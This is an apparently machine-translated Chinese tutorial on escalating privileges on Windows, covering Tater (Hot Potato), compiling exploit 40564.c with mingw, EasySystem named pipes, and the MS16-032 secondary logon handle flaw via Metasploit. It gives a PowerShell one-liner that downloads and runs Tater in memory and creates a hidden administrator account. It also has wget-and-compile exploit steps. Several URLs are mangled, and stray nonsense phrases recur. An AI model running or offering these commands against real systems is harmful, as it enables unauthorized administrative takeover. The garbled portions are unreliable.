使用 Tater、Sploits提升权限
使用 Tater 提升权限
使用 PowerShell 版本的 Hot Potato – Tater,它会立即加载到内存中并且不会在磁盘上留下任何痕迹!你可以在一行中运行该实用程序:
powershell “IEX (New-Object Net.WebClient).DownloadString('1Yd'); Invoke-Tater -Trigger Command “”net user User1 Password1 /add && net localgroup administrators User1 /add”””
之后,用户 User1 将出现在系统中,密码为 Password1,它是 Administrators 组的成员。但需要注意的是,对于 Windows 10,应该使用 -Trigger 2 开关。
在 Kali 中编译Sploits
毫无疑问,用于渗透测试/黑客攻击的主要操作系统是Linux,为它实现了一堆工具,通常很少有人在Windows下破解。默认情况下一切都很好没有访问权限的英文,直到你需要在 Windows 下编译sploit(在我们的例子中,以提高权限)。通过安装 Mingw-w64 解决了这个缺陷:
apt-get update
apt-get install mingw-w64
然后一切都很简单,下载sploit并编译:
wget‐‐output-document= 40564.c
i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32
如果你已经有本地管理员并且唯一的问题是如何访问系统,那么你可以查看小的EasySystem实用程序。正如该实用程序的作者所写,这不是一个漏洞利用,而是一个模拟命名管道的“古老而肮脏”的技巧。
Windows 权限提升。EasySystem 和命名管道授予 NT AUTHORITYSYSTEM
在某些情况下,这样的工具可以派上用场。我们不会详述技术细节,如果你有兴趣,可以在此处和此处阅读有关此技术的更多信息。
辅助登录句柄
另一个有趣的技巧涉及使用辅助登录服务。此服务允许你以管理员身份运行程序、Microsoft 管理控制台、控制面板项目,即使当前用户仅属于 Users 或 Power Users 组。底线是该服务在创建新进程时不会清除句柄。
对我们来说重要的是几乎所有版本的 Windows(x32 和 x64)都受到此漏洞的影响:从 Vista 到 Windows 2012 Server。但是有一些限制:要成功提升权限,必须在系统上安装 PowerShell 2.0 或更高版本,并且必须存在两个或更多 CPU 内核。Metasploit框架有一个特殊的模块exploit/windows/local/ms16_032_secondary_logon_handle_privesc。
它的使用意味着我们已经有一个meterpreter会话,我们必须在参数中指定它:设置会话1。好吧,如果操作成功,我们将拥有另一个具有提升权限的会话。
对于相同的漏洞,还有一个PowerShell 脚本可以启动具有系统权限的命令 shell。以及执行相同操作的已编译二进制文件。
顺便说一句没有访问权限的英文,微软发布了一个补丁,所以在尝试提升权限之前,请检查它是否已安装:
C:Userspentestlab>wmic qfe list | find “3139914”
本文到此结束,希望对大家有所帮助!